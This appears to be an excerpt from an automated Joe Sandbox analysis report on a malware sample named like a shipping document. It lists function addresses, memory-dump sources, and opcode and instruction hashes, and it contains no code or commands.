Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bff828bdd9f723ce34e47171f713514f6c51a38414e5629c6799582b00dda20
Instruction ID: 3989256084b52e93882afbac0cb5a93cf951b939770ad9e4819378c0d108788d
Opcode Fuzzy Hash: 4bff828bdd9f723ce34e47171f713514f6c51a38414e5629c6799582b00dda20
Instruction Fuzzy Hash: 7C31F574E012088FDF14DFAAD9946DEBBF2AF89300F24D02AC419BB254EB345946CF51

Function 06A9D8D8 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d24c6a9b887eebbd89fa5aad7403d3f49f001e63e4dfa5490cc95941c505b16a
Instruction ID: c257198f811c34e6f95a85b26dbbc08b2235e652d4a2d122a1784fc7c551c1c9
Opcode Fuzzy Hash: d24c6a9b887eebbd89fa5aad7403d3f49f001e63e4dfa5490cc95941c505b16a
Instruction Fuzzy Hash: 6431283290A7855FDF42BF38D8606AA3FE1EF46200F1440A6F485DF652CA34DA55C7A1

Function 044D5612 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38f9c8ea4c3cee0725ce3001d32bf378fc89fae42ea9a06bd1b46857d296882e
Instruction ID: 6ae9e7b7eff48432701e9aebe9f96da6e26b62adf3ca28e81e317db2bc0551eb
Opcode Fuzzy Hash: 38f9c8ea4c3cee0725ce3001d32bf378fc89fae42ea9a06bd1b46857d296882e
Instruction Fuzzy Hash: C7314730605251AFCF2A9B38CCA847E7BB1AF423847584497E059DB293EF30E802C7D2

Function 06A94778 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c09c08a5d9b18d68bc608b36d5638a20de3fef6d5b51694a9eabcec18b8b3bdc
Instruction ID: bcafd0539c464287624159660ae94bf0a20f5d497a05dd761cd51aaac9eb2344
Opcode Fuzzy Hash: c09c08a5d9b18d68bc608b36d5638a20de3fef6d5b51694a9eabcec18b8b3bdc
Instruction Fuzzy Hash: BD318D35A101189FEB48EBA4E8556EE7BF6EF8D321F208429D401A7284DB349D46CBA1

Function 06A963DA Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3bcc5484a537f69180d1ca057a4151f48bd685c4c26ce973969f21fd9e7dd38
Instruction ID: 79dde9806a88ef9cf58d21b17563e473593aa108b3b6080952e1d0e34a87e804
Opcode Fuzzy Hash: e3bcc5484a537f69180d1ca057a4151f48bd685c4c26ce973969f21fd9e7dd38
Instruction Fuzzy Hash: CA214975849214CEFF54EF60E2842FDBBF8AB0A315F24312AD109A6192C3385689CF60

Function 06A990E8 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ea7d7123ffb96029741c4af15d123bd64abd19bbbebaca7d0cbac56b63611a8
Instruction ID: ded57e266892a38417b6391a675be590cbf753aeb23703d4a271790b46bd05ab
Opcode Fuzzy Hash: 2ea7d7123ffb96029741c4af15d123bd64abd19bbbebaca7d0cbac56b63611a8
Instruction Fuzzy Hash: D931FA74D04208DFEF44DFA6D4496EEBBFABF8A300F24A029E415A7266DB345945CF60

Function 044DAF71 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01ffde05909268be2c8debce227106efd96944ba0c0542046edac3b2e4b07d3c
Instruction ID: 9ed863f173b0057039b55406ac7ca76435b8aad6fa799a80503851f3216d11b0
Opcode Fuzzy Hash: 01ffde05909268be2c8debce227106efd96944ba0c0542046edac3b2e4b07d3c
Instruction Fuzzy Hash: CB2178A616551B8FE3142770D86D56B3A96DB4B307F047C16D30BB21F34E3819458D6B

Function 0A1502E8 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6aa6151734564a70568c38ccee2343405ccbe7221e1a9df14f414c19ec5d3280
Instruction ID: 06a989fe63778344f6ccbd4ac5d60c88f271a534a4abc007049c435d8fed202c
Opcode Fuzzy Hash: 6aa6151734564a70568c38ccee2343405ccbe7221e1a9df14f414c19ec5d3280
Instruction Fuzzy Hash: 1821F5323002119FEBA4277AC89463D359BAFCC758F148038DD22CB394EBB9CD429785

Function 044DAF80 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4535763913.00000000044D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_44d0000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1c3b8624e5356574b5ad23287c7c0d16fbc198ef4c32dd99ab33ef86741d0bc
Instruction ID: 4bdc1211befe176c39d96c1d168d1bbaacb13072c1f3ceea041859fc041d5631
Opcode Fuzzy Hash: a1c3b8624e5356574b5ad23287c7c0d16fbc198ef4c32dd99ab33ef86741d0bc
Instruction Fuzzy Hash: 9F11466616551B8FE3142770D86D62B3A9ADB8B317F047C16930F721F34E3819018D6B

Function 06A9E5AA Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec4708ce110a756f9c72ee41f7e631b6dfbe814d0fba616013418bd8f5bd6837
Instruction ID: e2f0b8b7fe36182d86a450bb895ff4a77ac71778cd3a825bbe6b6164e154fafc
Opcode Fuzzy Hash: ec4708ce110a756f9c72ee41f7e631b6dfbe814d0fba616013418bd8f5bd6837
Instruction Fuzzy Hash: 3721F832B016119FDB55EB29D85462ABBE2FFCA751B1540A9E606DF352CF30DC02CBA1

Function 06A9AFB0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65743b552fc0919b07784b4fa5d3b6dbef31416551f53cc747a34bcc16f4b693
Instruction ID: 6725b631e7b7f56e023904ae0474e619b9a146dde47eee381f82c36ecece7add
Opcode Fuzzy Hash: 65743b552fc0919b07784b4fa5d3b6dbef31416551f53cc747a34bcc16f4b693
Instruction Fuzzy Hash: 6B219035E00205DFCF64EF64D5409AF77A5EB89264B24C01AD81E9B284DB35EA06CBE2

Function 06A97BFF Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bf311313fb963fe82509c6470178e11244805a5974396ca7d33a55ea2b450f6
Instruction ID: 00cc980d358eefe16c37aa63e0f7d4ef9d63912f0e29ebf35b18317a50382fe0
Opcode Fuzzy Hash: 3bf311313fb963fe82509c6470178e11244805a5974396ca7d33a55ea2b450f6
Instruction Fuzzy Hash: F1312774D15218DFDB44DFA9D8855EDBBF6AF89300F24902AE419A7351DB305801CF60

Function 06A90006 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b83ad73ddaf19f526cdd3403cd33c11d3c9e6f811b8299cfff284e44b7a37929
Instruction ID: e9eb4292745152233f01ce8f7236f20a23155a4e2ff0f9b1ec91c430b7ad91ec
Opcode Fuzzy Hash: b83ad73ddaf19f526cdd3403cd33c11d3c9e6f811b8299cfff284e44b7a37929
Instruction Fuzzy Hash: FE318070D096588FEB1ACFA6CC5479EFFF6AF86300F18C0AAD448AA256CB740545CF61

Function 06A95589 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9950838c70321760eea0b7faae147976eb3af07bb4f335bc34e7577810b8db7d
Instruction ID: bac2ba25b09bb7393d09ba6210d74d6ad04381395384a3f60727a204b59f3de1
Opcode Fuzzy Hash: 9950838c70321760eea0b7faae147976eb3af07bb4f335bc34e7577810b8db7d
Instruction Fuzzy Hash: 4F312475E002199FDB45DFA9D485ADEBBF1FF48310F10812AE905AB350DB34AA40CFA0

Function 008AD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4529371095.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ad000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb356971508445154ff3ed0f568cc015cac2a7af86b32edbfd545143fe925508
Instruction ID: 76d5bfb5acfa835fe98454b9d59c6e41d4624f184e08b7593addbbf5504e6751
Opcode Fuzzy Hash: fb356971508445154ff3ed0f568cc015cac2a7af86b32edbfd545143fe925508
Instruction Fuzzy Hash: 71214571900304DFEB05DF14C9C0F26BF65FB99318F20C569E80A8BA56C33AD806DBA2

Function 06A9299D Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1aacc5b84edc682fab4bfc9214eb43f0090dbeb105edb844c3d477eb8f1e1d05
Instruction ID: 65f80a90c9bb86fe93a19f3bfd8a71f917c5e6f9e1415e1aecbf0b7336ee25b2
Opcode Fuzzy Hash: 1aacc5b84edc682fab4bfc9214eb43f0090dbeb105edb844c3d477eb8f1e1d05
Instruction Fuzzy Hash: FB318BB4A052288FEB30DB28D945B997BF9BB89300F0061E9D50DA7B16D7304E41CF61

Function 008BD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4529415200.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8bd000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62fd612a1ced09906c8a38d86744b83e67f7bfd555eab112ca1b9430b6e172ff
Instruction ID: 8a4a29484fb7f28f665f9f13fa9af2fcc9a5839a476bd040a3a400202c6d51fc
Opcode Fuzzy Hash: 62fd612a1ced09906c8a38d86744b83e67f7bfd555eab112ca1b9430b6e172ff
Instruction Fuzzy Hash: B921F275604704EFCB14EF24D984B66BF65FB88314F24C569D90A8B396D33AD807CA61

Function 008BD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4529415200.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8bd000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6dd281919366b347187ce8ca92dbd43ce873cecdd027de32b2333a459f514e
Instruction ID: 4185b8517e007daa938332d9299935945235955c0067431f0ecb5cad30b2c99a
Opcode Fuzzy Hash: bf6dd281919366b347187ce8ca92dbd43ce873cecdd027de32b2333a459f514e
Instruction Fuzzy Hash: BB21F271504384EFDB05DF24D9C0B66BBA5FB88318F20C56DE9098B396D33AE806CB61

Function 06A95590 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b851e4cf3492586043ec799316d03158e77608b1f74b58f86e511a9271e0469
Instruction ID: 9afa9593a83d891db665d6effcdfd1d731846689fd486d76aa5a6d9251659d32
Opcode Fuzzy Hash: 5b851e4cf3492586043ec799316d03158e77608b1f74b58f86e511a9271e0469
Instruction Fuzzy Hash: 9031C374E102199FDB45DFA9D485ADEBBF5FF88310F14812AE915AB360DB34A940CFA0

Function 06A96B70 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a79d2f9065cd9a2d2c05436d7b066534f4f6046286977d950fbeab4779ce24e
Instruction ID: 61cc57c3bdbbdd727b14b407958d327e94c41eba67dc1f18894c9c004203e670
Opcode Fuzzy Hash: 0a79d2f9065cd9a2d2c05436d7b066534f4f6046286977d950fbeab4779ce24e
Instruction Fuzzy Hash: 0911C47488D124CFFF80EFA491541FCBAF9AF5A301F24B015E00AA6257E7384545CAA4

Function 06A97109 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3af40ba780fbc0286c4b12034f1dc0f80079867b5172c6318b418b69f8fc695c
Instruction ID: 765ff4a95c6538be7fcca0a89a3f193435d5c2d9c0e38b7548f70ee40c17c2d6
Opcode Fuzzy Hash: 3af40ba780fbc0286c4b12034f1dc0f80079867b5172c6318b418b69f8fc695c
Instruction Fuzzy Hash: 8E21AE35D19218DFEB44EFA5D8155EDBBFAEB8E311F24A025D409B3262DB315801CBB4

Function 06A93DA0 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba5496fd438ad65344d6b47006c53d5523b531d035325bd4559abae530db2449
Instruction ID: cae5627ad39b9d18ae3e6a515ce81a16f84fb8f077fac3256dc5c02d0f9fa058
Opcode Fuzzy Hash: ba5496fd438ad65344d6b47006c53d5523b531d035325bd4559abae530db2449
Instruction Fuzzy Hash: D8119330F04214AFDF58AA799D146BA7AFAEF85B20F248529E805CB345EB348D4187E0

Function 06A9C945 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97be8dbe79dfadd608b3e04cd3fbb2c75a0d2273a6a2568eb3426080d6540c11
Instruction ID: 12f77003c783ccd62493164263eb502380402e0a2d9235c8ff662e06ee46c1bf
Opcode Fuzzy Hash: 97be8dbe79dfadd608b3e04cd3fbb2c75a0d2273a6a2568eb3426080d6540c11
Instruction Fuzzy Hash: 08317E78E11209CFCB44EFA8D59489DBBF2FF49314B209469E819AB365D731A901CF50

Function 06A90E88 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0519c1ca3d4c73d49072585603ee186d6a678066e3ad340b3508b18aa9786a97
Instruction ID: bcb95656582ac1416c003c62aec07d6e5e79f637c75e8962ce3d6b45b2b7c2d3
Opcode Fuzzy Hash: 0519c1ca3d4c73d49072585603ee186d6a678066e3ad340b3508b18aa9786a97
Instruction Fuzzy Hash: E511BE35A09108DFDB44DFA9D540AA9BBF6EF4A350F25C0D9D408DB222C7319E00DB91

Function 06A97118 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4464ae346521c29d735f376beb647fa40e881bf64517a3cf007a1343e9dbe0
Instruction ID: 0a1d273b40e779133e806608003205e34509573ec2bcfa1b218791591bcc2b69
Opcode Fuzzy Hash: 6f4464ae346521c29d735f376beb647fa40e881bf64517a3cf007a1343e9dbe0
Instruction Fuzzy Hash: 7B117C34E19218CFEB44DFA5D4155EDBBFAAB8E311F24A029D509B3262CB319805CBB4

Function 0A1516C9 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1364b505e9d6eac33cfa9934e0c561aeff603e17e490beb8c37845be093def19
Instruction ID: 2ab4060a46e3cc8c552ed085b56b5a696c46d6b85a68eb1d49b4860e720a9b8b
Opcode Fuzzy Hash: 1364b505e9d6eac33cfa9934e0c561aeff603e17e490beb8c37845be093def19
Instruction Fuzzy Hash: C1216875E01248EFCB05EFB9D540AEDBFF2AF48201F248169E861E6260DB30DA41CF20

Function 06A96466 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5ac5045f436210754afeab56dae49161cc29fc923cda3f8c071bd0ae4876cd0
Instruction ID: de0a3def2b8527cdb178575be4b466281ca174f4ee1e26bf1eecb57a7c597fa3
Opcode Fuzzy Hash: c5ac5045f436210754afeab56dae49161cc29fc923cda3f8c071bd0ae4876cd0
Instruction Fuzzy Hash: 64212834C09218CFFF61EFA4D5896ADBBF8FB49301F20212AD109A3252C7385985CF60

Function 0A153258 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48b2c59f868eb3acc5debe36a2051269b7794d2847d527aab0b8c38e5491ef2e
Instruction ID: 94798bd58a0d9a07447d949ddf96e9cc5de59667a3c838ab7a249632f3afaf8a
Opcode Fuzzy Hash: 48b2c59f868eb3acc5debe36a2051269b7794d2847d527aab0b8c38e5491ef2e
Instruction Fuzzy Hash: 932160367001089FDB188F65D855BDDBBB9BB8C350F109169E926E7350DB71AC11CBA0

Function 008BD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4529415200.00000000008BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8bd000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd5dd64b6891ab2164ad4aebde36e9a78ab589e019d5416b8113f97b83c3800
Instruction ID: c4f9c122e0b0961a0a7055a30b1b707f64c944be47ce5a11aa8d0b921ea7b1ba
Opcode Fuzzy Hash: 4fd5dd64b6891ab2164ad4aebde36e9a78ab589e019d5416b8113f97b83c3800
Instruction Fuzzy Hash: 452180755087809FCB02DF14D994B11BFB1FB46314F28C5EAD8498F2A7D33A981ACB62

Function 06A9782F Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d24ab1d2b7ec49d4bffc0b508cf02195bce2b7e3575a304278dc43ee3923c43
Instruction ID: f16f765b271ce8ff6be79cfdd3a1a3285ce61b9e1b76c3827cfdc8a8f872825c
Opcode Fuzzy Hash: 1d24ab1d2b7ec49d4bffc0b508cf02195bce2b7e3575a304278dc43ee3923c43
Instruction Fuzzy Hash: 6221E734A45228DFEB50DF60E846BECB7B9FB49701F209094E60DA7382CB715E858F50

Function 06A9AEAF Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdcfa0ba9e9b5286f8078c87714231cfbf122fdaf82130bed02e8732f4c2825e
Instruction ID: 908cb60ba17a99eaa28708ddd1f7b2b1fc94782197612558af73254407501206
Opcode Fuzzy Hash: bdcfa0ba9e9b5286f8078c87714231cfbf122fdaf82130bed02e8732f4c2825e
Instruction Fuzzy Hash: B42102B4D0425E8FCF00EFA8D9855EEBFF4AF09300F20416AD908B7251EB345A95CBA1

Function 0A1571D0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3cae87f83d6d40eaddb8143110f27e95e156504cc2bf1d0e6dee374fdc65f2f
Instruction ID: 034fbc3082df9652c3be286c5cdcddac7013506a08eb86742023e6f3e6e4ee4c
Opcode Fuzzy Hash: f3cae87f83d6d40eaddb8143110f27e95e156504cc2bf1d0e6dee374fdc65f2f
Instruction Fuzzy Hash: 94213A70E012098FDB05EFB8D94569EBFF6FB45301F00C5A9D114AB26AEB749A09CB81

Function 0A15A480 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4541392787.000000000A150000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a150000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69e55a79d623db7b64087fc6c10e655c4843f9d6090453800046982b8d1f069e
Instruction ID: e52c2838553264a2b6300a12d2fa2a43dbacecdd8e5b5b0feeccd2dc5cedd8d5
Opcode Fuzzy Hash: 69e55a79d623db7b64087fc6c10e655c4843f9d6090453800046982b8d1f069e
Instruction Fuzzy Hash: EA118276A00209DFCB149FB4D8585EE7FA6FF88760B014429E826D7340DB304D52CBA1

Function 008AD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4529371095.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ad000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 5f354f0686efdd6f4a478e9d85a0b63fc23899df4723efffb7149d552a1f6b04
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 91112672804380CFDB02CF10D5C4B16BF71FB98314F24C6A9D84A8BA56C336D85ADBA2

Function 06A967B8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6505346e7f3713e3b5203b58ca980f6c5f00293fd3255cce52fc38f9b37282d8
Instruction ID: eb408ffa2e5c494de1158faeb1d72b3253f389cb97185f9ade8ef734e463a6af
Opcode Fuzzy Hash: 6505346e7f3713e3b5203b58ca980f6c5f00293fd3255cce52fc38f9b37282d8
Instruction Fuzzy Hash: A2F0D6359091248BFF489BA5E4455FDB7BCAF8F321F20B02AD10AB3142DA3544548AF4

Function 06A98238 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4538747990.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a90000_Copy shipping docs PO EV1786 LY ECO PAK EV1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2afded69a4f56512321f094f637a02e5603478a459a541f4394e029821486cd4
